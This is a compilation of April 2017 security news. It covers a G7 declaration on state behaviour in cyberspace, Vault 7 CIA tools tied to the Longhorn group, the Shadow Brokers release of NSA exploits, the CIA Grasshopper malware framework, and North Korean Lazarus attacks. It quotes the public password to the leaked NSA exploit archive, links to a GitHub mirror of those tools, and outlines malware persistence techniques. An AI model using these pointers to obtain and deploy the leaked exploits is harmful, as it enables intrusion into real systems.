Presented the voluntary, non-binding norms of State behavior during peacetime in the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE.
The risk of escalation and retaliation in cyberspace, the increasing number of cyber attacks and cyber threats even more sophisticated could have a destabilizing effect on international peace and security. The risk of conflict between states caused so cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.

G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE

I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE, I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed to propose stability and security in the cyberspace. The declaration invites all the States to collaborate with the intent to reduce risks to international peace, security, and stability.

Below the point presented in the Declaration:

Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist, and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should 5 not use authorized emergency response teams to engage in malicious international activity.
No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank the colleagues Luigi Martino and Marco Lapadura that worked with me at the declaration, and of course to Minister Gianfranco Incarnato that led the group of work.


WikiLeaks CIA Files Linked to Espionage Group

11.4.2017 securityweek  BigBrothers

Researchers at Symantec have analyzed the Vault 7 files published in recent weeks by WikiLeaks and determined that they are very similar to ones used by a cyberespionage group tracked by the security firm as “Longhorn.”

The Vault 7 leaks cover exploits and tools allegedly used by the U.S. Central Intelligence Agency (CIA) to hack a wide range of systems, including PCs, Macs, mobile devices and IoT products. Based on an analysis of the files, Symantec is fairly confident that some of the Vault 7 documents describe the tools and techniques used by Longhorn.

According to the security firm, Longhorn is a threat group that has been around since at least 2011, but possibly as early as 2007. Symantec has been tracking the APT since 2014, when it used a Windows zero-day exploit (CVE-2014-4148) to deliver a backdoor called Plexor.

Researchers have observed Longhorn attacks aimed at more than 40 targets across 16 different countries in Europe, Asia (Middle East and other regions) and Africa. The list of targets includes governments, international organizations, and companies in the telecoms, financial, aerospace, energy, IT, education, and national resources sectors. Symantec pointed out that all of the targeted entities could present an interest to a nation-state actor.

An analysis of Longhorn’s tools and working hours suggests that the group is located in North America and its members are English speakers.

The CIA has neither confirmed nor denied that the Vault 7 files are authentic. The agency said its mission is to collect foreign intelligence from overseas entities, and pointed out that it is legally prohibited from spying on Americans.

Symantec noted that it did detect one Longhorn malware infection in the United States, but an uninstaller was launched within hours, which could indicate that the computer had been infected unintentionally.

In addition to Plexor, Longhorn has used several other pieces of malware in its operations, including Trojans dubbed Corentry, LH1 and LH2.

Corentry’s development timeline coincides with the dates mentioned in a changelog file published by WikiLeaks for a tool called Fluxwire. Experts also determined that the Plexor backdoor is very similar to a tool named in the Vault 7 documents “Fire and Forget.”

Researchers also found similarities between the cryptographic protocols described in the Vault 7 files and the ones used by Longhorn.

“Other Vault 7 documents outline tradecraft practices to be used, such as use of the Real-time Transport Protocol (RTP) as a means of command and control (C&C) communications, employing wipe-on-use as standard practice, in-memory string de-obfuscation, using a unique deployment-time key for string obfuscation, and the use of secure erase protocols involving renaming and overwriting. Symantec has observed Longhorn tools following all of these practices,” the security firm said in a blog post.

If confirmed, Longhorn would be the second cyber espionage group whose activities have been tied to the U.S. government. The first was the NSA-linked Equation Group, whose mistakes were analyzed by the individuals who developed the Vault 7 tools.


Symantec confirms that Longhorn group is tied to CIA operators detailed in Vault 7
11.4.2017 securityaffairs BigBrothers

Symantec reportedly linked the CIA hacking tools to several cyber attacks powered over the years by the Longhorn group.
Security experts who analyzed the alleged CIA hacking tools included in the Vault 7 dump have been used against at least 40 governments and private organizations across 16 countries.
Researchers at company firm Symantec reportedly linked the CIA hacking tools to a number of cyber attacks launched in recent years by a threat actor the company identified as the Longhorn group.

“Spying tools and operational protocols detailed in the recent Vault 7 leak have been used in cyberattacks against at least 40 targets in 16 different countries by a group Symantec calls Longhorn. Symantec has been protecting its customers from Longhorn’s tools for the past three years and has continued to track the group in order to learn more about its tools, tactics, and procedures.” reads the analysis published by Symantec.

“The tools used by Longhorn closely follow development timelines and technical specifications laid out in documents disclosed by WikiLeaks.”

Symantec believes Longhorn is a North American hacking group that has been active since at least 2011. The group is very sophisticated and used zero-day exploits and complex malware to conduct targeted attacks against governments and organizations in almost every industry, including financial, energy, telecommunications and education, aerospace.

The Longhorn group is a well-resourced hacking team that operated on a standard Monday to Friday working week in an American time zone. The nature of the targets and its Techniques, Tactics, and Procedures (TTPs) suggests the Longhorn group is a state-sponsored crew.

The targets were all in located in the Middle East, Europe, Asia, and Africa. On one case, the researchers observed the Longhorn group compromising a computer in the US, following infection, an uninstaller was quickly executed, which demonstrates that this victim was infected unintentionally.

“The Longhorn group shares some of the same cryptographic protocols specified in the Vault 7 documents, in addition to following leaked guidelines on tactics to avoid detection.” continues Symantec. “Given the close similarities between the tools and techniques, there can be little doubt that Longhorn’s activities and the Vault 7 documents are the work of the same group.” continues Symantec.

Digging the precious Vault 7 archive the experts discovered the Fluxwire cyber espionage malware. The documents related to this malware include a changelog of dates for when new features were added to the malicious code, the features, the timeline are coherent with the development cycle of the Corentry malware created by Longhorn APT.
“These dates align closely with the development of one Longhorn tool (Trojan.Corentry) tracked by Symantec. New features in Corentry consistently appeared in samples obtained by Symantec either on the same date listed in the Vault 7 document or several days later, leaving little doubt that Corentry is the malware described in the leaked document.” reads Symantec.

“Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file. The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0.”

Longhorn group

“Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler.”

A second document in the Vault 7 archive details Fire and Forget, a specification for user-mode injection of a payload by a tool called Archangel.

The specification of the malicious code and the interface used to load it matches the Longhorn tool called Backdoor.Plexor.

The experts discovered many other similarities, another leaked CIA document outlined cryptographic protocols that should be implemented in the malware development.
“A third document outlines cryptographic protocols that malware tools should follow. These include the use of inner cryptography within SSL to prevent man-in-the-middle (MITM) attacks, key exchange once per connection, and use of AES with a 32-bit key. These requirements align with the cryptographic practices observed by Symantec in all of the Longhorn tools.” continues Symantec.

another Vault 7 document recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.

All the above techniques and protocols were implemented in all the hacking tools of the Longhorn group.

Researchers from Symantec discovered a number of indicators that confirm Longhorn was from an English-speaking, North American country.

“The acronym MTWRFSU (Monday Tuesday Wednesday ThuRsday Friday Saturday SUnday) was used to configure which day of the week malware would communicate with the attackers. This acronym is common in academic calendars in North America.” reads Symantec.”Some of the code words found in the malware, such as SCOOBYSNACK, would be most familiar in North America. In addition to this, the compilation times of tools with reliable timestamps indicate a time zone in the Americas.”

Summarizing, there is no doubt Longhorn group has the same abilities and hacking tools of the CIA operators documented in the Vault 7 documents.


Symantec Connects 40 Cyber Attacks to CIA Hacking Tools Exposed by Wikileaks
11.4.2017 thehackernews BigBrothers
Security researchers have confirmed that the alleged CIA hacking tools recently exposed by WikiLeaks have been used against at least 40 governments and private organizations across 16 countries.
Since March, as part of its "Vault 7" series, Wikileaks has published over 8,761 documents and other confidential information that the whistleblower group claims came from the US Central Intelligence Agency (CIA).
Now, researchers at cybersecurity company Symantec reportedly managed to link those CIA hacking tools to numerous real cyber attacks in recent years that have been carried out against the government and private sectors across the world.
Those 40 cyber attacks were conducted by Longhorn — a North American hacking group that has been active since at least 2011 and has used backdoor trojans and zero-day attacks to target government, financial, energy, telecommunications, education, aerospace, and natural resources sectors.
Although the group's targets were all in the Middle East, Europe, Asia, and Africa, researchers said the group once infected a computer in the United States, but an uninstaller was launched within an hour, which indicates the "victim was infected unintentionally."
What's interesting is that Symantec linked some of CIA hacking tools and malware variants disclosed by Wikileaks in the Vault 7 files to Longhorn cyber espionage operations.
Fluxwire (Created by CIA) ≅ Corentry (Created by Longhorn)
Fluxwire, a cyber espionage malware allegedly created by the CIA and mentioned in the Vault 7 documents, contains a changelog of dates for when new features were added, which according to Symantec, closely resemble with the development cycle of "Corentry," a malware created by Longhorn hacking group.
"Early versions of Corentry seen by Symantec contained a reference to the file path for the Fluxwire program database (PDB) file," Symantec explains. "The Vault 7 document lists removal of the full path for the PDB as one of the changes implemented in Version 3.5.0."
"Up until 2014, versions of Corentry were compiled using GCC [GNU Compiler Collection]. According to the Vault 7 document, Fluxwire switched to an MSVC compiler for version 3.3.0 on February 25, 2015. This was reflected in samples of Corentry, where a version compiled on February 25, 2015, had used MSVC as a compiler."
Similar Malware Modules
Another Vault 7 document details 'Fire and Forget' specification of the payload and a malware module loader called Archangel, which Symantec claims, match almost perfectly with a Longhorn backdoor called Plexor.
"The specification of the payload and the interface used to load it was closely matched in another Longhorn tool called Backdoor.Plexor," says Symantec.
Use of Similar Cryptographic Protocol Practices
Another leaked CIA document outlined cryptographic protocols that should be used within malware tools, such as using AES encryption with a 32-bit key, inner cryptography within SSL to prevent man-in-the-middle attacks, and key exchanges once per connection.
One leaked CIA document also recommends using of in-memory string de-obfuscation and Real-time Transport Protocol (RTP) for communicating with the command and control (C&C) servers.
According to Symantec, these cryptographic protocol and communication practices were also used by Longhorn group in all of its hacking tools.
More About LongHorn Hacking Group
Longhorn has been described as a well-resourced hacking group that works on a standard Monday to Friday working week — likely a behavior of a state-sponsored group — and operates in an American time zone.
Longhorn's advanced malware tools are specially designed for cyber espionage with detailed system fingerprinting, discovery, and exfiltration capabilities. The group uses extremely stealthy capabilities in its malware to avoid detection.
Symantec analysis of the group's activities also shows that Longhorn is from an English speaking North American country with code words used by it referring, the band The Police with code words REDLIGHT and ROXANNE, and colloquial terms like "scoobysnack."
Overall, the functionality described in the CIA documents and its links to the group activities leave "little doubt that Longhorn's activities and the Vault 7 documents are the work of the same group."


Shadow Brokers Release More NSA Exploits

10.4.2017 securityweek BigBrothers
The hacker group calling itself “Shadow Brokers” has released another round of exploits and tools allegedly used by the NSA-linked threat actor “Equation Group,” along with a message to U.S. President Donald Trump.

Over the weekend, the group published the password to a previously released password-protected archive. An analysis of the files revealed the existence of various exploits and lists of organizations apparently targeted by the Equation Group.

Google Project Zero researcher Tavis Ormandy said one of the leaked exploits, dubbed EXACTCHANGE, relies on a Linux kernel vulnerability that can be exploited for local privilege escalation. Ormandy believes the Equation Group had the exploit “for years” before it was discovered by Google researchers in 2009.

An analysis conducted by Maksym Zaitsev showed that the leaked files include what appear to be Solaris exploits, a cross-platform RAT, Linux keyloggers, exploits targeting Cisco firewalls, system fingerprinting tools, an IP.Board exploit, and Apache and Samba zero-days affecting several Linux distributions.

A researcher who uses the online moniker “x0rz” also analyzed the latest dump and identified a tool that can clean logs (TOAST), a fake Chinese browser (ELECTRICSLIDE), and several GSM-related tools (CURSEHAPPY, EDITIONHAZE, LIQUIDSTEEL, SHAKENGIRAFFE, WHOLEBLUE). He also found evidence that the Equation Group had been looking for clues of attacks by other threat actors on compromised systems.

Experts also found lists of IP addresses and domain names that may belong to organizations targeted by the Equation Group, and they pointed out that victims include U.S. allies.

The Shadow Brokers had initially attempted to sell the exploits they obtained, but none of their strategies, including auctions and direct sale offers, was successful. While the group has now made available another batch of files for free, Zaitsev and others, including Edward Snowden, believe there are still some files that have not been released.

8 Apr
Edward Snowden ✔ @Snowden
Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so... (1/2)
Follow
Edward Snowden ✔ @Snowden
...much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal.
8:32 PM - 8 Apr 2017
881 881 Retweets 1,475 1,475 likes

In a message they posted on Medium, the Shadow Brokers told President Trump that they are disappointed by his actions.

“TheShadowBrokers voted for you,” the hackers said. “TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning ‘your base’, ‘the movement’, and the peoples who getting you elected.”

The group has once again claimed that it is not connected to Russia, but they did say that Russia and Putin are the United States’ “best allies until the common enemies are defeated and America is great again.”

However, some people have pointed out that the timing of the leak is suspicious – it comes shortly after the U.S. decided to bomb Syria, which is an ally of Russia. Some experts had previously suggested that the Shadow Brokers is actually an English-speaking group.

While many of the exploits leaked previously by Shadow Brokers turned out to rely on old vulnerabilities, some companies, including Cisco, did identify some zero-days. It remains to be seen if tech companies confirm any unpatched flaws in the latest leaks.


The Shadow Brokers release more alleged NSA hacking tools and exploits
9.4.2017 securityaffairs BigBrothers

The Shadow Brokers hacking crew sent a message to President Trump commenting recent political events and released more alleged NSA hacking tools.
The Shadow Brokers is the mysterious group that in October 2016 claimed to have stolen a bunch of hacking tools used by the NSA for its operations.

At the end of October 2016, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The Shadow Brokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC.

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.A couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

In December 2016, the Shadow Brokers has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.

Back to the present, today the Shadow Brokers group released more alleged hacking tools and exploits that allegedly belong to the Equation Group.

The group has launched the bomb, it has finally released password for the encrypted dump of NSA files and anyone can access them.

The group shared the following password:

CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN

in a blog post on the Medium platform titled “Don’t Forget Your Base“

The post is an open letter to President Donald Trump, the group expressed its point of view on the Trump’s policy, it explicitly refers Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.

“Respectfully, what the fuck are you doing? TheShadowBrokers voted for you. TheShadowBrokers supports you. TheShadowBrokers is losing faith in you. Mr. Trump helping theshadowbrokers, helping you. Is appearing you are abandoning “your base”, “the movement”, and the peoples who getting you elected.” reads the post.

A security expert that goes online with the Twitter handle x0rz, has uploaded all files after decryption on Github.

Shadow brokers tools

A close look at the archive revealed the existence of numerous tools that was developed to target specific platforms, including:

rpc.cmsd a remote root zero-day exploit for Solaris Unix-based operating system.

Follow
x0rz @x0rz
Solaris rpc.cmsd remote root exploit (TAO's EASYSTREET) #0day
3:42 PM - 8 Apr 2017
121 121 Retweets 101 101 likes
The NSA access insided the GSM network of the Pakistan’s mobile operator Mobilink.

Follow
x0rz @x0rz
NSA operators notes about their access inside 🇵🇰Pakistan Mobilink GSM network https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/doc/old/etc/user.mission.sicklestar.COMMON … #ShadowBrokers #EquationGroup #APT
5:41 PM - 8 Apr 2017
50 50 Retweets 48 48 likes
The NSA Tailored Access Operations team (TAO) used the TOAST framework to clean logs of Unix wtmp events.

Follow
x0rz @x0rz
TAO's TOAST framework used to clean Unix wtmp events, no logs no crime 😏 #opsec
4:50 PM - 8 Apr 2017
63 63 Retweets 68 68 likes
The Equation Group used the ElectricSlide tool to impersonate a Chinese browser with fake Accept-Language.


Follow
x0rz @x0rz
One of the #EquationGroup tool (ELECTRICSLIDE) impersonates a Chinese browser with fake Accept-Languagehttps://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/bin/electricslide.pl …
5:53 PM - 8 Apr 2017
254 254 Retweets 262 262 likes
If you want, the group is still accepting donations, below its Bitcoin wallet: 19BY2XCgbDe6WtTVbTyzM9eR3LYr6VitWK

That received a total of 10.41198465 bitcoins


Shadow Brokers Group Releases More Stolen NSA Hacking Tools & Exploits
8.4.2017 thehackernews BigBrothers
Remember The Shadow Brokers? They are back.
A hackers group that previously claimed to have stolen a bunch of hacking tools (malware, zero-day exploits, and implants) created by the NSA and gained popularity last year for leaking a portion of those tools is back.
Today, The Shadow Brokers group released more alleged hacking tools and exploits that, the group claims, belonged to "Equation Group" – an elite cyber attack unit linked to the NSA.
Besides dumping some NSA's hacking tools back in August 2016, the Shadow Brokers also released an encrypted cache of files containing more NSA's hacking tools and exploits in an auction, asking for 1 Million Bitcoins (around $568 Million).
However, after failed auction, the group put up those hacking tools and exploits for direct sale on an underground website, categorizing them into a type — like "exploits," "Trojans," and "implant" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Now, the Shadow Brokers has finally released password for the encrypted cache of NSA's files, allowing anyone to unlock and download the auction data dump.
CrDj”(;Va.*NdlnzB9M?@K2)#>deB7mN
The password mentioned above for the encrypted NSA files was made public through a blog post published today.
The blog post, titled "Don't Forget Your Base," has been written as an open letter to President Donald Trump, containing political views expressed by the Shadow Brokers on Trump's recent policies and events, like the Goldman Sach, the air strike against Syria and removal of Steve Bannon from the National Security Council, among others.
A security researcher, who uses Twitter handle x0rz, has uploaded all files after decryption on Github and confirmed that the archive includes:
rpc.cmsd a remote root zero-day exploit for Solaris – Oracle-owned Unix-based operating system.
The TOAST framework that NSA's TAO (Tailored Access Operations) team used to clean logs of Unix wtmp events.
The Equation Group's ElectricSlide tool that impersonates a Chinese browser with fake Accept-Language.
The evidence of the NSA operators' access inside the GSM network of Mobilink, one of the Pakistan's popular mobile operator companies.
More key findings will come as soon as other security researchers delve into the dump.
At the time, it's not confirmed whether the group holds more NSA hacking tools and exploits or this is the last batch of documents the Shadow Brokers stole from the United States intelligence organization.


WikiLeaks Reveals CIA's Grasshopper Windows Hacking Framework
8.4.2017 thehackernews BigBrothers
WikiLeaks reveals 'Grasshopper Framework' that CIA used to build Customized Windows Malware
As part of its Vault 7 series of leaked documents, whistleblowing website WikiLeaks today released a new cache of 27 documents allegedly belonged to the US Central Intelligence Agency (CIA).
Named Grasshopper, the latest batch reveals a CLI-based framework developed by the CIA to build "customised malware" payloads for breaking into Microsoft's Windows operating systems and bypassing antivirus protection.
All the leaked documents are basically a user manual that the agency flagged as "secret" and that are supposed to be only accessed by the members of the agency, WikiLeaks claims.
Grasshopper: Customized Malware Builder Framework
According to the leaked documents, Grasshopper framework allows the agency members to easily create custom malware, depending upon the technical details, such as what operating system and antivirus the targets are using.
The Grasshopper framework then automatically puts together several components sufficient for attacking the target, and finally, delivers a Windows installer that the agency members can run on a target's computer and install their custom malware payloads.
"A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components," the documentation reads. "Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload."
The whistleblowing website claimed the Grasshopper toolset was allegedly designed to go undetected even from the anti-virus products from the world's leading vendors including Kaspersky Lab, Symantec, and Microsoft.
CIA's Grasshopper Uses 'Stolen' Russian Malware
According to WikiLeaks, the CIA created the Grasshopper framework as a modern cyber-espionage solution not only to be as easy to use as possible but also "to maintain persistence over infected Microsoft Windows computers."
"Grasshopper allows tools to be installed using a variety of persistence mechanisms and modified using a variety of extensions (like encryption)," Wikileaks said in the press release.
One of the so-called persistence mechanisms linked to Grasshopper is called Stolen Goods (Version 2), which shows how the CIA adapted known malware developed by cyber criminals across the world and modified it for its own uses.
One such malware is "Carberp," which is a malware rootkit developed by Russian hackers.
"The persistence method and parts of the installer were taken and modified to fit our needs," the leaked document noted. "A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified."
It is not yet clear how recently the CIA has used the hacking tools mentioned in the documentation, but WikiLeaks says the tools were used between 2012 and 2015.
So far, Wikileaks has revealed the "Year Zero" batch which uncovered CIA hacking exploits for popular hardware and software, the "Dark Matter" batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs, and the third batch called "Marble."
Marble revealed the source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the CIA to hide the actual source of its malware.


WikiLeaks leaked files on the Grasshopper framework, a CIA Tool for creating customized malware installers
8.4.2017 securityaffairs BigBrothers 

Wikileaks published a new batch of 27 documents detailing the Grasshopper framework used by its agents to create custom installers for Windows malware.
WikiLeaks continues to disclose documents included in the CIA Vault 7 archive, on Friday published a new batch of 27 documents detailing a framework, dubbed Grasshopper, allegedly used to create custom installers for Windows malware.

The Grasshopper framework allows CIA operators to build a custom payload, run it and analyzed the results of the execution.

The leaked documents compose a user guide classified as “secret” that was available to the CIA cyber spies.

“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

CIA Grasshopper framework

The dropper described in the Grasshopper manual should be loaded and executed only in memory, the framework allows creating custom malware that is able to compromise the target system bypassing the antivirus it is using.

“A Grasshopper executable contains one or more installers. An installer is a stack of one or more installer components,” reads the manual. “Grasshopper invokes each component of the stack in series to operate on a payload. The ultimate purpose of an installer is to persist a payload.”

Each executable generated with the Grasshopper framework contains one or more installers.

The framework offers to the operators various persistence mechanisms that can define a series of rules that need to be met before an installation is launched. The rules allow attackers to target specific systems specifying its technical details (i.e. x64 or x32 architecture, OS).

“An executable may have a global rule that will be evaluated before execution of any installers. If a global rule is provided and evaluates to false the executable aborts operation” continues the manual.

One of the persistence mechanisms reported in the user guide is called Stolen Goods, basically, the CIA exploited the mechanisms implemented by the malicious codes used by crooks in the wild.

For example, the CIA has modified some components of the popular Carberp rootkit.

“The persistence method and parts of the installer were taken and modified to fit our needs,” reads a leaked document. “A vast majority of the original Carberp code that was used has been heavily modified. Very few pieces of the original code exist unmodified.”

Another persistence mechanism leverages the Windows Update Service to allow the execution of the payload on every system boot or every 22 hours, this technique uses a series of DLLs specified in the registry.

WikiLeaks has already leaked the “Year Zero” batch which contains detailed info on the CIA hacking exploits and the “Dark Matter” batch which focused on exploits and hacking techniques the agency designed to target iPhones and Macs. A few days ago, WikiLeaks published the third batch called “Marble,” a collection of files describing the CIA anti-forensics tool dubbed Marble framework.


WikiLeaks Details CIA Tool for Creating Windows Malware Installers

8.4.2017 securityweek BigBrothers
WikiLeaks leaks more alleged CIA hacking tools

WikiLeaks on Friday published 27 documents detailing a framework allegedly used by the U.S. Central Intelligence Agency (CIA) to create custom installers for malware designed to target Windows systems.

The framework, dubbed “Grasshopper,” has been described as a tool that allows operators to build a custom installation executable, run that executable, and evaluate the results of the execution. The Grasshopper user guide specifies that the dropper should be loaded and executed only in memory.

Leaked documents show that Grasshopper provides various persistence mechanisms and allows users to define a series of conditions that need to be met before an installation is launched. These rules can help determine if the targeted device is running the correct version of Windows and if certain security products are present.

One of the persistence mechanisms highlighted by WikiLeaks involves the Windows Update Service, which can be abused to ensure that the payload is executed on every system boot or every 22 hours, when the service loads a series of DLLs specified in the registry.

WikiLeaks also highlighted Stolen Goods, a Grasshopper persistence module that borrows code from the notorious Carberp banking Trojan, whose source code was leaked a few years ago. The authors of Stolen Goods, however, pointed out that only some parts of the Carberp code were taken and those were heavily modified.

“The documents WikiLeaks publishes today provide an insights into the process of building modern espionage tools and insights into how the CIA maintains persistence over infected Microsoft Windows computers, providing directions for those seeking to defend their systems to identify any existing compromise,” WikiLeaks said.

This is the third round of files made public by WikiLeaks as part of the dump called Vault 7. The organization claims to possess numerous exploits allegedly used by the CIA and it has offered to share them with affected tech companies, but it appears that many firms are not willing to comply with WikiLeaks’ demands to obtain the information.

An analysis of the information made public to date has shown that many of the vulnerabilities have already been patched by security firms and tech giants such as Apple and Google. Cisco did admit finding a critical vulnerability affecting many of its switches following an analysis of the Vault 7 files.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


Kaspersky Links Global Cyber Attacks to North Korea

4.4.2017 securityweek BigBrothers
ST. MAARTEN – SECURITY ANALYST SUMMIT – Just days after reports surfaced that U.S. prosecutors were preparing to point fingers at the North Korean government for directing the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016, Kaspersky Lab unveiled new details on the hacking group believed to be conducting the attack and several others.

Considered to be one of the largest and most successful cyber heists ever, Kaspersky said there is a “high chance” that the attacks were conducted by Lazarus, a North Korea-linked hacking group responsible for a series of regular and destructive attacks, including the devastating attack against Sony Pictures in late 2014.

On Monday at Kaspersky Lab’s Security Analyst Summit in St. Maarten, the Moscow-based security firm shared its findings on the malicious tools the group uses and how it operates.

The company also said that it managed to disrupt other potential Lazarus operations attempting to steal funds from unnamed banks in Southeast Asia and Europe.

While Kaspersky’s team believes Lazarus to be large group focused on infiltration and espionage operations, the company said a “substantially smaller” unit within the group responsible for financial profit exists, which they have dubbed Bluenoroff.

In February, researchers discovered an attack aimed at banks in Poland that were linked back to Lazarus. As part of the operation, the attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) so malware would be served to its visitors.

“The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many,” Kaspersky explained. “Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.”

Since December 2015, Kaspersky Lab was able to detect malware samples relating to Lazarus group activity that appeared in financial institutions, casinos, software developers for investment companies and crypto-currency businesses in Korea, Bangladesh, India, Vietnam, Indonesia, Costa Rica, Malaysia, Poland, Iraq, Ethiopia, Kenya, Nigeria, Uruguay, Gabon, Thailand and several other countries.

Recent forensic analysis conducted by a Kaspersky Lab partner of a C2 server in Europe used by the Lazarus/Bluenoroff group also provided some interesting North Korea-related discoveries.

“Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2,” Kaspersky Lab's Global Research & Analysis Team explained in a blog post. “Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.”

North Korea Cyber Attack Attribution

Other firms, including BAE Systems and Symantec, previously had linked the Bangladesh theft to a series of cyber-attacks on the U.S. financial system and the hacking of Sony Pictures.

Still an Active Threat

Kaspersky’s team believes that Lazarus will remain one of the biggest threats to banking, finance and other firms for the next few years.

